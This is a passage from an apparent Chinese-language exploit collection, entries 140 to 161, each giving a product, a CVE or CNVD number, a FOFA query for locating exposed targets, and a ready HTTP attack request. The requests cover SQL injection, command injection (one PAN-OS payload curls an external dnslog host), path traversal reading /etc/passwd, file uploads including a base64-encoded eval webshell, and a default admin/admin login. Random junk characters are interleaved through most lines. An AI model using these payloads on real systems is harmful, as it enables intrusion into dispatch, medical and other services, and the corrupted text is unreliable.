Accept-Encoding: gzip, deflate, br2 g1 f" R/ W- g# ^: d8 [$ ?
Connection: close8 |2 B- ^' F6 `# z0 s! T
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
$ O3 ?, q, m% Z" A( z/ A5 X8 UUpgrade-Insecure-Requests: 1
! q4 X/ G# u, \& U3 I9 M4 q( Y
: ^4 d" c" c% k0 l9 e# d
( R/ J1 V5 @9 p8 D140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入, e) V: d6 B/ C* q
CVE-2024-2566% t% [( b5 ~: s# x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( C" A3 [5 j1 Z) f0 [4 \) W
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.18 [5 w6 _ v5 _3 E8 h( P% s6 o
Host: x.x.x.x& q+ c; k/ Q0 \8 P4 ~# Z" o# m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: o, {5 ^; h; ]* H/ ~ V) Z% v5 u' A KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& }( S" h4 v- [1 }# [( W' _% K; v% y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 {3 B, J7 ?. g* h. q0 VAccept-Encoding: gzip, deflate, br
" x, l+ q3 D7 K; N* S6 X9 G0 X5 rConnection: close& i2 p9 r: P* s& |% p; {
Cookie: authcode=h8g9# j, P: Y s7 g1 h, J/ m/ _
Upgrade-Insecure-Requests: 1% X! K3 r8 I8 H$ X$ }
7 D! p2 j) T, z* q7 X
# o$ O* B* A% w; |+ `4 v* S141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入+ N3 C$ v1 `* `" t* E0 k3 [
FOFA:body="指挥调度管理平台"
: D0 M& }5 X3 P" w$ X O7 WPOST /app/ext/ajax_users.php HTTP/1.1) |$ n; [' d7 G/ _
Host: your-ip+ J7 X& ^- I$ Z# e& t! f6 x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
' H8 p- [: n1 T7 g+ XContent-Type: application/x-www-form-urlencoded6 g, l9 a* j V+ D4 S- M+ ?/ E
; _" \. z: {( P5 r. E% v
0 r5 u5 \5 k1 S9 qdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -3 c% R+ Y8 n- a! q
; V' L3 N! }* _5 e; ?" }) j, F' o# c9 T
142. CMSV6车辆监控平台系统中存在弱密码
5 p0 M1 f* M2 I4 ^9 }( d6 rCVE-2024-29666, k1 }6 }; E) t% N2 S \: Z
FOFA:body="/808gps/": e) |. b7 h" c7 _, j
admin/admin. [& @" @5 w" G! m' F) t/ ^
143. Netis WF2780 v2.1.40144 远程命令执行
4 J( G- K( `+ j$ B* uCVE-2024-258501 d; [) H3 B% u
FOFA:title='AP setup' && header='netis': \& ~6 V4 [8 |0 e
PAYLOAD
: ^ A$ a5 V8 v+ ?% a! G8 S
' V9 M) v/ b, M: d& X144. D-Link nas_sharing.cgi 命令注入/ i- I( ^, x; q3 C: U
FOFA:app="D_Link-DNS-ShareCenter"
) r, a- M$ F& g' o9 _system参数用于传要执行的命令4 W# J/ b7 G" l; [2 c3 e+ _
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
. ]( f1 [& ?* s9 u" G. z+ WHost: x.x.x.x9 I. N2 T) b4 Q& y& y, N* |
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
0 q3 A5 G2 G3 y( S3 rConnection: close
* o: a# W& S3 C" [1 ~Accept: */*5 ]( U1 i" h1 a6 G C" U) c; |
Accept-Language: en9 B! o7 l( ^: M( X! }
Accept-Encoding: gzip. b* I7 ~% c u) B+ B7 D* v. J
3 x; M- y7 \# E. p& p
: D; o" }/ S8 x7 `145. Palo Alto Networks PAN-OS GlobalProtect 命令注入& U, T; w9 y4 R1 w7 I
CVE-2024-3400
_+ U, ~) \% hFOFA:icon_hash="-631559155"
5 N0 t) A! x# [1 @( l4 y0 m& l- c$ lGET /global-protect/login.esp HTTP/1.1
( t" C' y, e( D. q0 q7 y4 j0 dHost: 192.168.30.112:1005/ l/ Z( f4 P. v2 y( d, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 o% B0 i8 N' H5 g( ^# `* S* zConnection: close
; I7 W1 V0 _4 L, C2 s2 FCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;% r8 k1 B2 M) P
Accept-Encoding: gzip
0 c/ o; S& C7 @$ ]- R: l! I6 P+ G ~9 P6 _' @* |* _
' t- ?3 l& F, u5 y146. MajorDoMo thumb.php 未授权远程代码执行
' N) ^( d0 ] H7 ]& ]" J9 T+ QCNVD-2024-02175) r- a6 h5 w4 ^8 e5 l. k* G
FOFA:app="MajordomoSL": b6 }' G0 M. ~% t/ \& P
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.16 \$ C4 T' q, U: R& P
Host: x.x.x.x: H. q; `7 @- N) p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 w3 j% Z( A+ I( p( |Accept-Charset: utf-8
2 O4 @- G9 R$ q3 t# t, dAccept-Encoding: gzip, deflate3 r R" c: B# r3 K
Connection: close3 {% k2 L# C. G) `8 E) w0 j
: S3 `* X( J: _" f2 U! Y1 b
1 A( I) i( U8 g, T5 z7 C/ m147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: h3 E/ r2 J( I# T! O( nCVE-2024-32399+ j0 @1 [6 E5 j8 s4 [
FOFA:body="RaidenMAILD"/ ]# |0 t& W0 _+ R
GET /webeditor/../../../windows/win.ini HTTP/1.17 D) H" l8 q- b ^( L K% g
Host: 127.0.0.1:815 f- A- L" F1 {( W
Cache-Control: max-age=0
1 z, p. r& ]* z9 `- f2 k( ~" J. P1 nConnection: close
/ c0 P8 }5 @, R5 B: I( n1 l8 @: a& L! V1 A
+ Y+ C# V1 e0 T" t/ D5 K. t5 u148. CrushFTP 认证绕过模板注入 a* p; |' f7 ]: N3 K) ^) H) W
CVE-2024-4040- Y4 N" w, U/ C6 \" Y
FOFA:body="CrushFTP"
" ?$ c1 t2 U2 E7 F) y1 Y6 w6 g- MPAYLOAD
- I8 I' v+ C# }4 l1 k
' i( k2 h. Q8 f/ R0 D/ N, j3 a149. AJ-Report开源数据大屏存在远程命令执行- Q6 F) W$ w, W# I# @
FOFA:title="AJ-Report"% {$ k, m( X: D f! D# t
2 _; t" h) \5 [' e3 R+ A
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1! ]: U, s: V h: }& }; P
Host: x.x.x.x# m) U' h; O' U, n0 L+ D# g4 j" \$ U4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 {/ T0 y, O* V: i* DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 `' f I. z/ B5 G" XAccept-Encoding: gzip, deflate, br
( b) ?; e" g" s( k6 [3 nAccept-Language: zh-CN,zh;q=0.9
5 o4 E7 W% r: |( W5 Z. n4 @9 J9 |6 DContent-Type: application/json;charset=UTF-89 |$ C& | X7 h* e/ C8 s# S: ~
Connection: close
; [6 p9 f; r' k5 I# Y- F" w8 \- v$ `+ b3 h3 l6 ~* l
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- h0 n: I; W1 N4 l7 ~) m0 `9 m" b% R' }3 M/ o, B# H! Z, L: {
150. AJ-Report 1.4.0 认证绕过与远程代码执行
4 a! L# `9 R F. n' [+ BFOFA:title="AJ-Report"" a6 f9 z: W. d$ e1 }' O
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1) \/ t C/ W& x R
Host: x.x.x.x
) f( s2 r5 b1 ~2 e! |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 ~6 ^4 w0 F, M0 V4 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 V9 B, t' E ^0 X) d' U7 j
Accept-Encoding: gzip, deflate, br: W; E% Y7 M& Q0 M4 J& J0 r
Accept-Language: zh-CN,zh;q=0.9) L6 j3 b8 p+ p. p1 h) t9 C) l
Content-Type: application/json;charset=UTF-8* O9 f) b. u" H# |8 W: v
Connection: close
- l! a; A0 U. H7 }% L* @! {' xContent-Length: 339
( u5 D' {* _; j5 S# e) ?. B/ F5 e! n3 L1 N
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}, [0 D" O% @6 ^6 ^% T% O, k2 X- o4 x% _
8 F# [6 O, W) R; p( r
9 V$ y! E. q5 Y151. AJ-Report 1.4.1 pageList sql注入2 n$ q/ {) L. u
FOFA:title="AJ-Report"- j% r0 G4 c# M. L& D# o5 M
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.15 i0 H/ U# y# A! }8 c
Host: x.x.x.x
$ P0 D3 X: U5 n9 u1 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% R& o9 j4 p: Q# [4 H" i
Connection: close
! ^! z; A6 l" T3 J3 i, F! b8 J WAccept-Encoding: gzip g' `7 V7 Z& m5 Y
" Q! n8 `* @" P! T5 f" r
$ b* W, N% C0 z& N5 r# v
152. Progress Kemp LoadMaster 远程命令执行4 R" _/ [+ Q6 h# y: O8 R0 b! T
CVE-2024-1212
6 Y4 E& W e2 `8 F; {+ X8 BLoadMaster <= 7.2.59.2 (GA)
2 D1 O# S) n/ i( qLoadMaster<=7.2.54.8 (LTSF); r& D! g% I* ?# t" F5 v
LoadMaster <= 7.2.48.10 (LTS)( h! r. [1 j5 ?0 ^9 A+ A
FOFA:body="LoadMaster"3 J: `( ]+ i6 B* x2 K _9 E
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码# x* h- A' G# u" B
GET /access/set?param=enableapi&value=1 HTTP/1.1% Q, Y: Y+ ~) M! L+ w2 P# \
Host: x.x.x.x
1 S! y+ ]! i$ m0 `# NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.12 E3 g5 q! A- ]# N, n
Connection: close& t T6 ]+ A' O- J8 |1 M
Accept: */*
+ d* r, J+ e* c1 vAccept-Language: en
8 a4 F- _7 k0 p: }& S1 N) SAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
v0 B) O2 W3 I) @+ v7 sAccept-Encoding: gzip
* S z$ }% M, X C) v+ m$ h M: l( E J8 D
$ G$ f2 x7 ?( }) k153. gradio任意文件读取5 a0 W4 o$ ?4 P8 L( e+ K* T
CVE-2024-1561FOFA:body="__gradio_mode__"* Y8 L& d; t3 m/ r
第一步,请求/config文件获取componets的id
! b+ k# I. H$ _$ c2 t; ahttp://x.x.x.x/config! M( k# m- T6 K
8 {: r! F! j( h; F4 }" T9 d/ S1 j+ `
第二步,将/etc/passwd的内容写入到一个临时文件
) g1 o9 w2 U' TPOST /component_server HTTP/1.1$ \7 k4 ^ s7 n5 u: `; L3 L
Host: x.x.x.x
% s6 M1 x& g% R _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' S0 z' v, b, I/ b f8 c
Connection: close7 j& R1 r* ]: U
Content-Length: 1150 p |# J6 p' @7 s1 J a
Content-Type: application/json ^# l1 z" ]. P3 u# _
Accept-Encoding: gzip- r9 f1 [8 a# l$ Y4 X: c
: l5 K& Z# P- ]+ w3 O8 H0 E
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"} X3 S/ n6 {* x4 e3 O
5 v4 ~" f$ V0 i& j# ^
6 O# G7 {) n8 Q2 c第三步访问
5 k8 ~/ \# l7 N+ a; i. }) ^6 a3 ]http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd7 D5 L3 w4 ~/ I
" t8 t6 R2 }1 |9 v% I6 r: v& `' Y6 F2 K5 B K
154. 天维尔消防救援作战调度平台 SQL注入
7 I; Q2 I* K- d$ _: pCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
8 Q# |! ]+ ^8 c( u$ Q' tPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
5 S: r! S) `: |& w5 _" THost: x.x.x.x$ y$ q7 m* n4 n% Q2 g( A+ _
Content-Length: 1066 x G( Y, _3 Y- |9 s8 t- T1 o
Cache-Control: max-age=0
+ A" H& @/ q* i- P8 k9 yUpgrade-Insecure-Requests: 1
+ H3 H6 u% s' j' E, }. v" W$ C5 C* HOrigin: http://x.x.x.x
/ `2 o, U: ^5 mContent-Type: application/json
/ |$ a9 B! X! ~$ b% S$ c3 A2 G H, qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
t1 v2 z1 [3 n: P' y9 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 d9 N9 ]. {& A; zReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
+ H' P: t" J& \. @7 Q, hAccept-Encoding: gzip, deflate
5 s7 J7 X' o( jAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
. D* U( c t+ R; Z$ D# m0 z# QConnection: close
. Q2 P3 {1 M2 J- Q
- T2 d) n. A+ ?( V{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}1 I# h# {! u6 A! U
/ G) m; T" f+ q; w1 `
% C1 @' `& W9 g
155. 六零导航页 file.php 任意文件上传
Z! Q& [: E$ F+ U4 TCVE-2024-34982
@) t6 D( z2 u. e$ dFOFA:title=="上网导航 - LyLme Spage" S& V/ Z6 \- u8 `0 M
POST /include/file.php HTTP/1.14 \3 e W+ ^, n- \( V9 A
Host: x.x.x.x$ s9 x8 W. w3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( ]) [, b, t# P' X/ ?
Connection: close
% b% W/ L2 t% x9 pContent-Length: 232- m5 d I1 m( x2 j `, V$ J
Accept: application/json, text/javascript, */*; q=0.013 X5 @: N* n7 r: M0 j
Accept-Encoding: gzip, deflate, br
, I! d; x0 k! @. [+ cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, x* k" @$ b0 ] H
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
. C3 C! {) y8 oX-Requested-With: XMLHttpRequest' J" H& z/ N4 s. V
& \9 o" m' `7 F! K
-----------------------------qttl7vemrsold314zg0f2 k. {* U! v; `5 ?* a2 [3 a4 j9 F
Content-Disposition: form-data; name="file"; filename="test.php"6 D$ j5 K- i* N( f: n
Content-Type: image/png2 O' e) C9 R3 L
9 H& P2 R& f! ^" {0 v4 C! ^4 Q
<?php phpinfo();unlink(__FILE__);?>9 p$ g' v# }( L& x; A* t# E* k2 h
-----------------------------qttl7vemrsold314zg0f--
( J; _$ l% j. |. H) R" Q
- j9 u1 j+ W, D" c
4 b7 l. \) Y+ D6 Z访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
! }' N$ S* V8 D [
2 ?0 M" @* S: P5 K156. TBK DVR-4104/DVR-4216 操作系统命令注入
" M( b, F9 H3 }9 w) r4 x, g8 `CVE-2024-37215 n3 }; U: {5 Q3 C: `8 o5 ?7 g
FOFA:"Location: /login.rsp", W, t9 E) F0 Y4 p! C4 P+ S6 r
·TBK DVR-4104- _9 I# H8 A: f/ F: c; t8 J8 I
·TBK DVR-4216! U) F; ?; y" c9 c
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"9 i6 {; F2 d5 s7 f2 k' Q2 u5 m
4 E$ M$ f! S6 M! M2 {* X+ s3 d+ r0 z4 \5 @" P& H
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, h0 t" c8 e6 r$ \# [ c2 |/ Z( THost: x.x.x.x
: _' d& n& h3 h/ Z. EUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! s% C% Y: @! a h. e8 q
Connection: close" N, c! G2 @1 D0 J8 i- p+ x0 L
Content-Length: 0; S3 E3 A4 H% x
Cookie: uid=1
$ O6 j2 W# ~5 Y8 ^- YAccept-Encoding: gzip$ P m) t/ n8 E# f
, Z* C& Q7 N; _) E9 `
6 X) e1 D0 S* l% o: f: w0 ^& E157. 美特CRM upload.jsp 任意文件上传$ N- V; c- e( ]1 L7 F8 Q' E
CNVD-2023-06971
9 x0 ?' Y" {6 Q* `7 ?FOFA:body="/common/scripts/basic.js"
. _ I9 F. G5 E# F4 h9 L1 @POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
% W1 o+ S# ?' m5 r. T+ E/ d/ e0 YHost: x.x.x.x
) W. o! H: o+ f0 U* ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
7 _. n$ d5 l) f' A: BContent-Length: 7097 ]# o4 P/ u& Z9 @/ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 n( p9 N: z8 ~1 N
Accept-Encoding: gzip, deflate0 `% e# @0 E+ O6 C9 c" X, B
Accept-Language: zh-CN,zh;q=0.9
) B# w! a* B, q: F) }Cache-Control: max-age=0
8 v3 b) V0 v" n8 H5 [. sConnection: close
0 N7 Q9 h( s0 G! e2 K+ x: ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN% `1 @3 V1 \, w0 s
Upgrade-Insecure-Requests: 1$ P. e' y/ O9 {, s. q1 K5 Y; J
2 h# ^8 h1 d- @, F------WebKitFormBoundary1imovELzPsfzp5dN
# z* l% }+ j- N: p3 LContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"- R: ?7 [# t9 o: W
Content-Type: application/octet-stream+ @: z) R8 a+ ]/ K
6 r' J# e$ M* M8 O( T
nyhelxrutzwhrsvsrafb
" i* w, `8 I' Y. G, J------WebKitFormBoundary1imovELzPsfzp5dN0 V3 U7 n+ p+ U; w X4 L/ G
Content-Disposition: form-data; name="key"
7 J& F @3 @3 f' ]
+ \* H# n# f1 V1 w/ q: Q/ Y8 Nnull
' S+ @) b1 E% H4 X4 D' H3 b( Q------WebKitFormBoundary1imovELzPsfzp5dN8 q6 K" Q! e4 l# t
Content-Disposition: form-data; name="form"
2 Q V3 R# B& f0 l, E; S5 K; h$ v3 V% {2 Y- L V
null% G6 n7 r! u4 D1 x$ _# }
------WebKitFormBoundary1imovELzPsfzp5dN) A5 ]( j4 B" U+ A8 C# ~
Content-Disposition: form-data; name="field"- { G: @: a9 k9 `! `: _8 T
# U5 y& o3 D2 dnull
4 N* U% U: j2 P, o' T------WebKitFormBoundary1imovELzPsfzp5dN7 V' R: ^7 ^# ]. H# v$ t% x
Content-Disposition: form-data; name="filetitile"$ l" L* M' H. o& H" a$ i! {
6 _- l) g# n4 f3 Jnull0 q% W$ m( S' F/ V7 C- C& y
------WebKitFormBoundary1imovELzPsfzp5dN
" e9 K; z* \5 |1 p0 ZContent-Disposition: form-data; name="filefolder", N+ ?) u. W# [" a+ N& [# o4 _3 f
% o& r% j7 g9 _0 f' d% d0 e
null
: i1 P8 ^2 y: u- ^------WebKitFormBoundary1imovELzPsfzp5dN--$ u7 v. {! w( i$ A9 q5 v
/ C1 D# h# D- ?* V; A
" C# B* X% E. `2 P7 Zhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp" f) ?0 W7 l6 |8 ~# v, x' l
; `/ T. S3 O- Q3 p158. Mura-CMS-processAsyncObject存在SQL注入
, d9 b9 P& w' n6 c: @' j3 `! dCVE-2024-326401 R+ F- P" n7 n) n0 U0 P( z
FOFA:"Generator: Masa CMS"
* j! v: P2 P m0 M- x$ dPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1- N! O- T4 k. v& d
Host: {{Hostname}}
5 I; D7 V3 {' v. d# FContent-Type: application/x-www-form-urlencoded3 S- q) I# {( o5 x4 K6 X+ R
$ E& V$ F+ Y8 ?! |+ [, }. k8 D
object=displayregion&contenthistid=x\'&previewid=1
( [% \% i( V# W4 ^- [$ g+ W8 H
- S- k1 T) T4 ]
* p& @0 a. T# G159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传7 O! T+ Z2 x" v
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")$ A: x" n% n2 M( O. ~
POST /webservices/WebJobUpload.asmx HTTP/1.1
4 ~* }0 r. ^1 ?9 U: {0 ^# @2 h/ rHost: x.x.x.x- O: @6 B5 _- |3 Q' A9 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
$ a5 S4 [. N* y5 S1 k+ ZContent-Length: 1080
: C; s2 _# M6 L- H+ m7 VAccept-Encoding: gzip, deflate7 N: D: Z" D8 Z/ A0 h. L
Connection: close
$ n' \* C) w: [' }7 cContent-Type: text/xml; charset=utf-82 i( d# ^1 E1 a9 r3 ?" b
Soapaction: "http://rainier/jobUpload"
* x' Z$ c5 x9 V2 s+ `" j. k: V+ h0 }% ^9 C2 C+ |1 X
<?xml version="1.0" encoding="utf-8"?>! y" u6 m% J/ A7 t6 ^
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 ^$ Z$ k1 T" _' H' S( A* p<soap:Body>9 o7 ?2 S4 ^/ ^; r0 x: ^9 [7 m
<jobUpload xmlns="http://rainier">
+ y; [7 W7 y, b! l/ N1 Z<vcode>1</vcode>
2 T1 Q1 C, z, e$ ?2 V( P! X<subFolder></subFolder>
& ]# N: d4 I( X7 @7 ~' _/ Y<fileName>abcrce.asmx</fileName>
4 h1 ^5 }$ [ |2 @<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>2 y0 t5 K, D8 l2 a8 O; Q7 A6 q7 G
</jobUpload>! ?0 o7 ~0 x' C5 u# c$ E# w
</soap:Body>, T; b, w [3 u. [& F) u7 M
</soap:Envelope>7 R* m$ u. u- C2 F8 C0 @
) u0 @1 U7 G1 [! J: D3 j8 W
/ r9 O' Q* z0 ]
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
. x. q/ g& |4 a; k, X- B/ _( Y5 q: t' S* E. z% g0 O
& W7 S2 v0 a, M
160. Sonatype Nexus Repository 3目录遍历与文件读取
9 m9 {( i$ x+ J; i8 s% KCVE-2024-4956: S1 @, a: `7 a S# C9 x7 B, G
FOFA:title="Nexus Repository Manager"
; J( C) f5 ]* c& M9 ~; u' [9 ]1 QGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
0 j% G# E# P$ r* BHost: x.x.x.x0 S; u c& |4 }: P/ B
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
4 C& D: c/ ^: WConnection: close
; a! z5 Z8 D9 m i4 n8 z2 i, CAccept: */*4 C$ X& t" f/ K
Accept-Language: en- J) s) |/ T! M# J( n4 h, e6 f
Accept-Encoding: gzip
j5 ~$ ~- J% P" _
* N/ i' i# a% v) B* u1 u: ]
" Q# K' f, B# ]* Y, Q7 X5 i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
- C# a. f- `2 ]# u! a; zFOFA:body="/KT_Css/qd_defaul.css"
* q- p6 i- I# {% V' l, i& g第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密, B& s- r4 F' R5 v2 C
POST /Webservice.asmx HTTP/1.1
, k7 a( m) q/ f# OHost: x.x.x.x$ Y. M) f+ a% I/ K! ~7 w& Y* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.365 ^3 H# L8 v* j8 O: N
Connection: close+ q1 X2 I- y; T: v
Content-Length: 445$ V3 A7 a! Z. Q+ K! d4 W4 [
Content-Type: text/xml
/ X$ Y- v, C$ y. {/ F& sAccept-Encoding: gzip: d& p% A/ N9 q- p+ t7 v+ M
" E3 {+ G: n) J- f7 h8 J$ N
<?xml version="1.0" encoding="utf-8"?>
- I% ^2 g- W' S5 t+ w9 b- [9 n<soap:Envelope xmlns:xsi="
% ~) |+ F: d3 a4 ahttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"+ _: |9 E0 B( `2 i
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 U4 n# L% y4 p- w8 v t) v) G<soap:Body>, ^* w5 Y, n0 Y9 ~( P+ T% R
<UploadResume xmlns="http://tempuri.org/">, I, i# L9 F* T& J9 a: ]! ]+ f: Z' |: B
<ip>1</ip>
" n0 [% Y+ B6 h3 ^, g( {/ O<fileName>../../../../dizxdell.aspx</fileName>3 K* Z+ ]$ T9 U$ A1 f& x' V
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>( a5 T# O2 _( M" ]
<tag>3</tag>
, U- i6 P" x* \1 B2 n. K</UploadResume>' D7 t( x2 c8 G* N5 X# S
</soap:Body>
" m5 R+ x1 G Y+ S9 O</soap:Envelope>
4 N" ^1 E; m( N7 B3 U L1 D" ^4 a
! i% S, h1 ~) G8 Y) j4 W/ xhttp://x.x.x.x/dizxdell.aspx
8 t1 V) ^' \0 V! |( c' O& d
